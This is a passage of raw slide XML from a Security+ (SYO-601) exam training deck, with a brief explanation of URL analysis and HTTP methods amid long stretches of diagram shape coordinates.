              <a:t>Certificatio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>SY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t>601  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>Training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11928" y="306451"/>
            <a:ext cx="62306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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Uniform</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Resource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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Locator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analysis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81910" y="1882292"/>
            <a:ext cx="12916535" cy="13093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200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>By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pointing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3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host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service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location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Internet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(via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domain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name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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IP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address),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Uniform </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Resource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Locator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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(URL)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encode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some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operations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will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sent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server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host.</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef>
            </a:pP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Following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different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HTTPS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methods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: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7244" y="760476"/>
            <a:ext cx="8531352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317105" y="5654700"/>
            <a:ext cx="1244600" cy="79057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algn="ctr" marR="66675">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:endParaRPr sz="2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dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Methods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823806" y="3914328"/>
            <a:ext cx="4398645" cy="4272915"/>
            <a:chOff x="5823806" y="3914328"/>
            <a:chExt cx="4398645" cy="4272915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7955280" y="4146803"/>
              <a:ext cx="1607820" cy="1851660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1607820" h="1851660">
                  <a:moveTo>
                    <a:pt x="1542605" y="336384"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1542059" y="290195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532978" y="244970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515503" y="202069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489773" y="162890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1455928" y="128778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1416011" y="102349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373009" y="85217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1328254" y="77190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283081" y="78092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238834" y="87731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196848" y="105905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158494" y="132435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125093" y="167132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1099185" y="207911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1082255" y="251853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074204" y="297611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074889" y="343789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084211" y="389026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102042" y="431927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128280" y="471106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162812" y="505206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202588" y="531647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1245349" y="548779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1289773" y="556806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334592" y="555904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378470" y="546265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420139" y="528091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458290" y="501561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491615" y="466852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517510" y="426085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1534464" y="382143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1542605" y="336384"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1607820" h="1851660">
                  <a:moveTo>
                    <a:pt x="1607820" y="833501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1578622" y="791451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548498" y="750341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517484" y="710107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485646" y="670725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453045" y="632117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419733" y="594233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392631" y="603732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1365008" y="610743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337017" y="615099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308862" y="616585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258912" y="612114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1210830" y="599084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165707" y="578065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124712" y="549656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091514" y="517829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063650" y="481253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041692" y="440512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026210" y="396189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017778" y="348869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015771" y="307289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017168" y="286689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019683" y="265684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977773" y="240982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935189" y="217360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891959" y="194843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848093" y="173443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803617" y="153187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758520" y="134099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712851" y="116179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666610" y="99479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619810" y="83985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572477" y="69748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524624" y="56769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476262" y="45059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427418" y="34671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378104" y="25590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328345" y="17856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278130" y="11480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227507" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176479" y="2908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125056" y="736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73279" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55435" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18986" y="1714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033653" y="1851660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599946" y="841629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1601851" y="837565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603883" y="835533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607820" y="833501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548116" y="5020055"/>
              <a:ext cx="1674495" cy="1854835"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1674495" h="1854834">
                  <a:moveTo>
                    <a:pt x="1333500" y="1025652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1332826" y="974394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330820" y="923455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327505" y="872845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322908" y="822604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317028" y="772731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309890" y="723252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1301521" y="674179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1291932" y="625551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281150" y="577354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269187" y="529640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256068" y="482396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241806" y="435660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226426" y="389458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209941" y="343776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192364" y="298665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173734" y="254127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154061" y="210185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133348" y="166852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111631" y="124142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088936" y="82092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065250" y="40703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040638" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462915" y="1029716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458978" y="1037844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455041" y="1041908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1852676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143508" y="1852676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147572" y="1854708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168781" y="1807616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1188974" y="1759610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208074" y="1710817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226045" y="1661350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242809" y="1611325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258316" y="1560830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243520" y="1548231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="1534693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202944" y="1504061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178737" y="1464538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161021" y="1421917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150061" y="1376946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146124" y="1330413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149477" y="1283081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161884" y="1230185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182700" y="1181506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1211097" y="1137907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246251" y="1100226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1287322" y="1069301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333500" y="1045972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333500" y="1025652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1674495" h="1854834">
                  <a:moveTo>
                    <a:pt x="1674279" y="1311567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1667332" y="1264856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651800" y="1221257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628495" y="1181900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598231" y="1147864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1561820" y="1120241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520088" y="1100137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473835" y="1088644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426222" y="1086129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380604" y="1093228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338033" y="1109129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299603" y="1133005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266355" y="1164005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239393" y="1201305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1219758" y="1244066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208532" y="1291463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1206068" y="1340205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213015" y="1386916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228547" y="1430515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251851" y="1469872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282115" y="1503908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318526" y="1531531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360258" y="1551635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406525" y="1563116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1454124" y="1565643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499743" y="1558544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1542313" y="1542643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580743" y="1518767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613992" y="1487766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640954" y="1450467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660588" y="1407706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671828" y="1360297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674279" y="1311567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581900" y="6917435"/>
              <a:ext cx="2092960" cy="1269365"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2092959" h="1269365">
                  <a:moveTo>
                    <a:pt x="1388376" y="1036612"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1385493" y="989418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373251" y="942467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351483" y="899033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322692" y="861898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288046" y="831646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1248689" y="808888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1205801" y="794194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160538" y="788187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114069" y="791438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067562" y="804545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025131" y="826236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988987" y="855357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="959637" y="890663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937564" y="930859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923315" y="974661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917397" y="1020787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920305" y="1067955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932561" y="1114894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954316" y="1158341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983068" y="1195489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017651" y="1225740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056855" y="1248511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1099502" y="1263192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144397" y="1269212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190371" y="1265948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1236218" y="1252816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279296" y="1231176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315948" y="1202055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345666" y="1166761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1367980" y="1126566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382369" y="1082751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388376" y="1036612"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2092959" h="1269365">
                  <a:moveTo>
                    <a:pt x="2092452" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="927354" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564769" y="1009421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1013472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1019556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620166" y="1014831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673481" y="1008761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726452" y="1001318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778929" y="992543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830745" y="982395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881761" y="970902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894372" y="926465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914107" y="884885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="940447" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972896" y="813701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010945" y="785799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1054100" y="764159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100188" y="750404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146657" y="745248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192593" y="748195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237030" y="758736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279055" y="776376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317752" y="800608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360563" y="776528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1402676" y="751344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444091" y="725055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484769" y="697699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524685" y="669302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1563839" y="639864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602206" y="609409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639760" y="577977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676488" y="545553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712353" y="512178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1747367" y="477862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781479" y="442633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814677" y="406514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846961" y="369506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878291" y="331635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1908657" y="292925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938032" y="253390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1966391" y="213055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993734" y="171945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2020036" y="130060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045258" y="87426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2069401" y="44069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2092452" y="0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484620" y="6083807"/>
              <a:ext cx="1618615" cy="1858010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1618615" h="1858009">
                  <a:moveTo>
                    <a:pt x="532193" y="1572018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="531647" y="1526032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522566" y="1481010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505091" y="1438275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479361" y="1399171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445516" y="1364996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405053" y="1338402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361797" y="1320990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317004" y="1312633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271945" y="1313180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227914" y="1322501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186169" y="1340421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148005" y="1366837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114681" y="1401572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1442491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71818" y="1486598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63677" y="1532521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64223" y="1578864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73304" y="1624266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90779" y="1667319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116509" y="1706676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150368" y="1740916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190233" y="1767522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233222" y="1784896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277977" y="1793176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323164" y="1792478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367423" y="1782927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409409" y="1764639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447789" y="1737728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481203" y="1702308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507098" y="1661490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524052" y="1617611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532193" y="1572018"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1618615" h="1858009">
                  <a:moveTo>
                    <a:pt x="1618488" y="1855724"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="580390" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7874" y="1001903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="1005967"/>
                  </a:lnTo>
                  <a:lnTo>
